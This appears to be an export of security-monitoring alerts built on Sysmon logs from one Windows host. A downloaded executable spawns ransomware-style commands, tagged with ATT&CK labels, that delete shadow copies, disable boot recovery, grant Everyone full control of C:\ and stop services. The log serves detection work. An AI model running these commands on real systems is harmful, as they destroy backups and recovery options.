""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:20.073555500Z"",""eventRecordID"":""1658"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:19.990\r\nProcessGuid: {df9fc3d3-1aa3-5ec9-0000-001062760e00}\r\nProcessId: 6912\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John 
Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:19.990"",""processGuid"":""{df9fc3d3-1aa3-5ec9-0000-001062760e00}"",""processId"":""6912"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.603",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:19.893 +ProcessGuid: {df9fc3d3-1aa3-5ec9-0000-00102c6e0e00} +ProcessId: 8116 +Image: C:\Windows\System32\bcdedit.exe +FileVersion: 10.0.18362.295 (WinBuild.160101.0800) +Description: Boot Configuration Data Editor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: bcdedit.exe +CommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default} +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","bcdedit /set {default} recoveryenabled No & bcdedit /set {default}","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:19.919372600Z"",""eventRecordID"":""1656"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:19.893\r\nProcessGuid: {df9fc3d3-1aa3-5ec9-0000-00102c6e0e00}\r\nProcessId: 8116\r\nImage: C:\\Windows\\System32\\bcdedit.exe\r\nFileVersion: 10.0.18362.295 (WinBuild.160101.0800)\r\nDescription: Boot Configuration Data Editor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: bcdedit.exe\r\nCommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John 
Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:19.893"",""processGuid"":""{df9fc3d3-1aa3-5ec9-0000-00102c6e0e00}"",""processId"":""8116"",""image"":""C:\\\\Windows\\\\System32\\\\bcdedit.exe"",""fileVersion"":""10.0.18362.295 (WinBuild.160101.0800)"",""description"":""Boot Configuration Data Editor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""bcdedit.exe"",""commandLine"":""bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.600",15,"ATT&CK T1070 T1490: Shadow Copies Deletion Using Operating Systems Utilities","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:19.892 +ProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010fd6d0e00} +ProcessId: 8108 +Image: C:\Windows\System32\vssadmin.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Command Line Interface for Microsoft® Volume Shadow Copy Service +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: VSSADMIN.EXE +CommandLine: vssadmin.exe Delete Shadows /all /quiet +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","vssadmin.exe Delete Shadows /all /quiet","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:19.918258300Z"",""eventRecordID"":""1655"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:19.892\r\nProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010fd6d0e00}\r\nProcessId: 8108\r\nImage: C:\\Windows\\System32\\vssadmin.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Command Line Interface for Microsoft® Volume Shadow Copy Service \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: VSSADMIN.EXE\r\nCommandLine: vssadmin.exe Delete Shadows /all /quiet\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John 
Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:19.892"",""processGuid"":""{df9fc3d3-1aa3-5ec9-0000-0010fd6d0e00}"",""processId"":""8108"",""image"":""C:\\\\Windows\\\\System32\\\\vssadmin.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Command Line Interface for Microsoft® Volume Shadow Copy Service"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""VSSADMIN.EXE"",""commandLine"":""vssadmin.exe Delete Shadows /all /quiet"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.495",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:19.888 +ProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010a56d0e00} +ProcessId: 8092 +Image: C:\Windows\System32\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: icacls ""C:\*"" /grant Everyone:F /T /C /Q +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","icacls \""C:\\*\"" /grant Everyone:F /T /C /Q","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:19.915262300Z"",""eventRecordID"":""1653"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:19.888\r\nProcessGuid: {df9fc3d3-1aa3-5ec9-0000-0010a56d0e00}\r\nProcessId: 8092\r\nImage: C:\\Windows\\System32\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: icacls \""C:\\*\"" /grant Everyone:F /T /C /Q\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 
12:44:19.888"",""processGuid"":""{df9fc3d3-1aa3-5ec9-0000-0010a56d0e00}"",""processId"":""8092"",""image"":""C:\\\\Windows\\\\System32\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""icacls \\\""C:\\\\*\\\"" /grant Everyone:F /T /C /Q"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:35.491",9,"Windows Application error event","""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. 
+] """,, +"May 23, 2020 @ 12:44:34.300",12,"Sysmon - Suspicious Process - explorer.exe","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:16.480 +ProcessGuid: {df9fc3d3-1aa0-5ec9-0000-0010ffa40d00} +ProcessId: 7660 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: explorer.exe /LOADSAVEDWINDOWS +CurrentDirectory: C:\Windows\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-1a9b-5ec9-0000-0010c5100d00} +ParentProcessId: 7432 +ParentImage: C:\Windows\System32\sihost.exe +ParentCommandLine: sihost.exe""","explorer.exe /LOADSAVEDWINDOWS","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:16.488376700Z"",""eventRecordID"":""1649"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:16.480\r\nProcessGuid: {df9fc3d3-1aa0-5ec9-0000-0010ffa40d00}\r\nProcessId: 7660\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: explorer.exe /LOADSAVEDWINDOWS\r\nCurrentDirectory: 
C:\\Windows\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-1a9b-5ec9-0000-0010c5100d00}\r\nParentProcessId: 7432\r\nParentImage: C:\\Windows\\System32\\sihost.exe\r\nParentCommandLine: sihost.exe\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:16.480"",""processGuid"":""{df9fc3d3-1aa0-5ec9-0000-0010ffa40d00}"",""processId"":""7660"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""explorer.exe /LOADSAVEDWINDOWS"",""currentDirectory"":""C:\\\\Windows\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-1a9b-5ec9-0000-0010c5100d00}"",""parentProcessId"":""7432"",""parentImage"":""C:\\\\Windows\\\\System32\\\\sihost.exe"",""parentCommandLine"":""sihost.exe""}}}" +"May 23, 2020 @ 12:44:34.248",9,"Windows Application error event","""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xe94 +Faulting application start time: 0x01d630ffccd5ad63 +Faulting application path: 
C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 14807a95-a99b-4365-b5f1-547eafcb6acb +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""",, +"May 23, 2020 @ 12:44:28.051",9,"Windows Application error event","""Faulting application name: OneDrive.exe, version: 20.52.311.11, time stamp: 0x95f7bd77 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000409 +Fault offset: 0x00088d30 +Faulting process id: 0x1694 +Faulting application start time: 0x01d630ffcd4bcc2a +Faulting application path: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\OneDrive.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 6ced96b8-7591-427f-be66-ba2988f2d41b +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:44:21.366",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:09.137 +ProcessGuid: {df9fc3d3-1a99-5ec9-0000-0010c0b70c00} +ProcessId: 7260 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1a97-5ec9-0000-0010aa7f0c00} +ParentProcessId: 6048 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop 
""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:09.157435500Z"",""eventRecordID"":""1634"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:09.137\r\nProcessGuid: {df9fc3d3-1a99-5ec9-0000-0010c0b70c00}\r\nProcessId: 7260\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1a97-5ec9-0000-0010aa7f0c00}\r\nParentProcessId: 6048\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:09.137"",""processGuid"":""{df9fc3d3-1a99-5ec9-0000-0010c0b70c00}"",""processId"":""7260"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating 
System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1a97-5ec9-0000-0010aa7f0c00}"",""parentProcessId"":""6048"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:44:21.274",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:08.839 +ProcessGuid: {df9fc3d3-1a98-5ec9-0000-001079ae0c00} +ProcessId: 7224 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1a98-5ec9-0000-0010e4880c00} +ParentProcessId: 6236 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" 
